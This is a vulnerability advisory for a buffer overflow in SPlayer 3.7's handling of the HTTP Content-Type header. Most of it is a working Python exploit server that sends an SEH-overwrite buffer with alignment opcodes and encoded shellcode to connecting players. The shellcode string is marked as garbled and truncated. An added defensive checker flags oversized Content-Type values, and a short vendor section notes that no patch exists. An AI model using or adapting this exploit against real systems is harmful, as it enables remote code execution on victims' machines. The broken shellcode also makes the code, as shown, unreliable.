Release date:
Updated on:
Affected Systems:
Splayer 3.7
Description:
--------------------------------------------------------------------------------
Bugtraq id: 47721
SPlayer is a simple multimedia player.
SPlayer has a remote buffer overflow vulnerability when processing the "Content-Type" header. Remote attackers can exploit this vulnerability to run arbitrary code or cause a denial of service in the affected application.
<* Source: xsploitedsec *>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
#!/usr/bin/python
# Exploit Title: SPlayer <= 3.7 (build 2055) Buffer Overflow Exploit
# Date: May 04, 2011
# Author: xsploitedsec <xsploitedsecurity [at] gmail [dot] com>
# Software Link: http://www.splayer.org/index.en.html
# Versions: <= 3.7 (build 2055)
# Tested On: WinXP SP3 Eng / SPlayer 3.7 build 2055 (English Locale)
# CVE: N/A
# Software Description:
# "SPlayer is a simple and free high performance all-in-one audio and video player that was designed
# in order to help you easily view your videos, images and listen to your music files. SPlayer lets
# you enjoy your favorite music and movies"
# Vulnerability information:
# SPlayer is vulnerable to a remote buffer overflow when parsing a specially crafted HTTP header from
# a remote server. The bug is triggered due to the "Content-Type:" field being passed to the wcstol()
# function prior to any bounds checking. This could allow an attacker to trick a remote user into
# opening a specially crafted playlist file containing a URL pointing to a malicious web server.
# Usage:
# Method 1:
# 1. Execute this script...
# 2. Launch SPlayer, right click and click Open -> URL (ctrl + u)...
# 3. Input the server URL and click OK...
# 4. Boom! /calc...
# Method 2:
# 1. Execute this script...
# 2. Launch SPlayer and click Open (ctrl + o)...
# 3. Browse to any playlist file (m3u, pls). It must contain the server URL! ...
# 4. Click Open...
# 5. [wait till URL is loaded], Boom! /calc...
# URL Examples:
# http://serverip/anyfilename.avi
# http://serverip:port/anyfilename.avi
# http://serverip/*
# Shouts:
# edb-team, corelanc0d3r/corelan-team, kaotix, sheep, deca, nemesis
import sys
import socket

bindaddr = "0.0.0.0"
bindport = 1234
banner = "Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1"

# Calc shellcode / alpha_upper
# Note: the encoded shellcode body is garbled in the source page and is not reproduced here;
# only its trailing fragment survived. Plenty of room for lots of shellcode here.
calcshell = ("D080Q2U0C000E0Z1111KPA")

class Client():
    def about(self):
        about = "\r=======================================================================================\n"
        about += "PoC Title: Exploit Title: SPlayer <= 3.7 (build 2055) Buffer Overflow\n"
        about += "Author: xsploitedsec <xsploitedsecurity [at] gmail [dot] com>\r\n"
        about += "======================================================================================="
        print about

    def run(self):
        pre = "HTTP/1.1 200 OK\r\n"
        pre += "Date: Tue, 03 May 2011 04:18:38 GMT\r\n"
        pre += "Server: " + banner + "\r\n"
        pre += "Last-Modified: Sun, 03 Jul 2005 18:39:44 GMT\r\n"
        pre += "ETag: \"1f3814d-e6800-3fb032cba1c00\"\r\n"
        pre += "Accept-Ranges: bytes\r\n"
        pre += "Content-Length: 99999\r\n"
        pre += "Connection: close\r\n"
        pre += "Content-Type: "
        # Begin edevil buffer
        edevil = "\x41" * 2073
        edevil += "\x61\x73"            # popad / nop align
        edevil += "\x25\x73"            # SE handler - ppr / splayer.exe [0x00730025]
        # Close the blinds
        edevil += "\x73"                # nop / align
        edevil += "\x55"                # push ebp
        edevil += "\x73"                # nop / align
        edevil += "\x58"                # pop eax
        edevil += "\x73"                # nop / align
        # Align to EAX / execute shellcode
        edevil += "\x05\x19\x11"        # add eax, 0x11001900
        edevil += "\x73"                # nop / align
        edevil += "\x2d\x11\x11"        # sub eax, 0x11001100
        edevil += "\x73"                # nop / align
        edevil += "\x50"                # push eax
        edevil += "\x73"                # nop / align
        edevil += "\xc3"                # ret
        edevil += "\x46" * 1004         # align shellcode -> EAX
        # End edevil buffer
        padding = "\x44" * (30000 - len(pre + edevil + calcshell)) + "\r\n"
        payload = pre + edevil + calcshell + padding
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.bind((bindaddr, bindport))
            s.listen(5)
            print "[+] Listening for incoming connections on port: %d" % bindport + "..."
        except:
            print "[!] Error binding socket, is the port already in use?\r\n[-] Exiting"
            sys.exit()
        # Note: SPlayer seems to connect / send a GET request twice every time a URL is processed
        # and it crashes after the second request
        while 1:
            (clientsock, address) = s.accept()
            print "[*] New connection from", address[0]
            clientsock.recv(1024)
            sent = clientsock.send(payload)
            print "[+] Payload sent successfully [size: %d bytes]" % sent
            sent = 0
            print "[-] Closing connection to", address[0]
            clientsock.close()

if __name__ == "__main__":
    Client().about()
    Client().run()
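As an added example that is not part of the original advisory or the author's PoC, the following Python 3 checker scans a raw HTTP response header block and flags the shape this bug relies on: a "Content-Type" value that is thousands of bytes long and is not a type/subtype media type. The length limit and the two sample responses are assumptions constructed for illustration.

```python
import re

MAX_CONTENT_TYPE_LEN = 256   # assumption: legitimate media types are far shorter
MEDIA_TYPE_RE = re.compile(rb"^[\w.+-]+/[\w.+-]+\s*(;.*)?$", re.DOTALL)

def parse_response_headers(raw):
    """Parse a raw HTTP response (bytes) into (status_line, {name: value}).

    Only the header block before the first blank line is read; names are
    lower-cased. Returns None when the data is not an HTTP response."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    if not lines[0].startswith(b"HTTP/"):
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def check_response(raw):
    """Return a list of findings for one raw HTTP response (empty if clean)."""
    parsed = parse_response_headers(raw)
    if parsed is None:
        return ["not an HTTP response"]
    _status, headers = parsed
    findings = []
    ct = headers.get(b"content-type")
    if ct is None:
        return findings
    if len(ct) > MAX_CONTENT_TYPE_LEN:
        findings.append("Content-Type value is %d bytes (limit %d)"
                        % (len(ct), MAX_CONTENT_TYPE_LEN))
    if not MEDIA_TYPE_RE.match(ct):
        findings.append("Content-Type is not a type/subtype media type")
    return findings

# Constructed samples (not captured traffic): a normal reply and one shaped like
# the PoC above, with a Content-Type value made of thousands of filler bytes.
BENIGN = (b"HTTP/1.1 200 OK\r\nServer: Apache\r\n"
          b"Content-Type: video/x-msvideo\r\nContent-Length: 10\r\n\r\n0123456789")
POC_SHAPED = (b"HTTP/1.1 200 OK\r\nServer: Apache\r\nContent-Length: 99999\r\n"
              b"Content-Type: " + b"A" * 2073 + b"D" * 1004 + b"\r\n")

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("poc-shaped", POC_SHAPED)):
        print(label, check_response(sample) or "clean")
```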
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Splayer
-------
Currently, the vendor does not provide a patch or upgrade. We recommend that users of the software check the vendor's homepage for the latest version:
http://www.splayer.org/index.en.html